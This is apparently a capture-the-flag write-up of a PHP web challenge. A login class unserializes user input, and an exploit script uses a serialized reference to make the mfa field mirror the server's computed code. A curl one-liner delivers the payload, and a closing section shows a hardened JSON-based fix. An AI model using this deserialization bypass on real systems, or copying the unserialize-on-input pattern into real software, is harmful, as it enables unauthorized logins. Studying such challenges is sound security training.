Corporate MFA [Web]

We've forgotten the password to our payroll machine. Can you extract it?


We are provided the source for a website.

In the source code we can see:

// Excerpt from the login class (enclosing class declaration and the MFA check omitted).
public function __construct($loginAttempt)
{
    // User-controlled input goes straight into unserialize().
    $this->userData = unserialize($loginAttempt);
    if (!$this->userData) {
        throw new InvalidArgumentException('Unable to reconstruct user data');
    }
}

private function verifyUsername()
{
    return $this->userData->username === 'D0loresH4ze';
}

private function verifyPassword()
{
    // bcrypt hash compared against the submitted password.
    return password_verify($this->userData->password, '$2y$07$BCryptRequires22Chrcte/VlQH0piJtjXl.0t1XkA8pw9dMXTpOq');
}

The site unserializes a user-supplied PHP object, then checks its username and password fields against hardcoded credentials. The MFA code is computed on the fly, but it is stored in a field of that same deserialized object and then compared with another field of the object.


We can't predict the MFA value, and brute-forcing it isn't practical, but PHP's serialization format can encode references between values. So instead of guessing, we serialize an object whose mfa field is a reference to the _correctValue field: whatever the server writes into _correctValue, mfa will read back the same value.

<?php
$x = array();

$x['username'] = "D0loresH4ze";
$x['password'] = 'rasmuslerdorf';
$x['_correctValue'] = 4;
// mfa is a PHP reference to _correctValue; serialize() encodes it as an R: token,
// so after unserialize() both fields are the same value.
$x['mfa'] = &$x['_correctValue'];

echo base64_encode(serialize((object)$x));


$ curl -s "$(php sploit.php)" \
| grep Congr | cut -d '>' -f2
Congratulations, your flag is:
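As an added illustration, not part of the original writeup or the challenge source, the script below shows why the reference trick works and how the check should have been written. The class and method names (VulnerableMfaCheck, HardenedMfaCheck, verifyMfa) are hypothetical; the vulnerable class mirrors the pattern described above (the server writes the computed code into the deserialized object and compares two of its fields), and the hardened one accepts a JSON document, which has no reference encoding, and compares the submitted code against a value the client never touches.

```php
<?php
// Added example, not the challenge's source: shows why a serialized reference
// defeats a "compare two fields of the deserialized object" MFA check, and a fix.
// Class and method names are hypothetical.

// 1. A payload built the same way as in the writeup: mfa aliases _correctValue.
$x = [];
$x['username'] = 'D0loresH4ze';
$x['_correctValue'] = 0;
$x['mfa'] = &$x['_correctValue'];
$payload = serialize((object) $x);
echo $payload, "\n";   // the mfa slot is emitted as an R: token, not a value

// 2. Vulnerable pattern: the freshly computed code is written into the
//    attacker-controlled object, then compared with another field of it.
class VulnerableMfaCheck
{
    private $userData;

    public function __construct(string $loginAttempt)
    {
        $this->userData = unserialize($loginAttempt);
        if (!$this->userData) {
            throw new InvalidArgumentException('Unable to reconstruct user data');
        }
    }

    public function verifyMfa(int $computedCode): bool
    {
        // mfa is a PHP reference to _correctValue, so this assignment also
        // changes what $this->userData->mfa reads back.
        $this->userData->_correctValue = $computedCode;
        return $this->userData->mfa === $this->userData->_correctValue;
    }
}

// 3. Hardened: parse a data-only format (JSON cannot express references or
//    object types) and compare the submitted code with a server-side value
//    that is never stored on the client-supplied structure.
class HardenedMfaCheck
{
    private array $userData;

    public function __construct(string $loginAttempt)
    {
        $decoded = json_decode($loginAttempt, true, 16, JSON_THROW_ON_ERROR);
        if (!is_array($decoded)) {
            throw new InvalidArgumentException('Unable to reconstruct user data');
        }
        $this->userData = $decoded;
    }

    public function verifyMfa(int $computedCode): bool
    {
        $submitted = $this->userData['mfa'] ?? null;
        if (!is_int($submitted)) {
            return false;
        }
        // Constant-time comparison of the two codes as strings.
        return hash_equals((string) $computedCode, (string) $submitted);
    }
}

// Constructed stand-in for the code the server computes per request.
$computedCode = random_int(100000, 999999);

$vulnerable = new VulnerableMfaCheck($payload);
var_dump($vulnerable->verifyMfa($computedCode));

$hardened = new HardenedMfaCheck(json_encode(['username' => 'D0loresH4ze', 'mfa' => 0]));
var_dump($hardened->verifyMfa($computedCode));
```

Run with `php example.php`: the first var_dump is true even though the payload never contained the code, because the R: token makes mfa and _correctValue one value; the second is false because the hardened check only ever compares the submitted integer with the server's own copy. Note that `unserialize($s, ['allowed_classes' => false])` would not help here: it blocks object instantiation, not the reference encoding, so replacing the format is the fix.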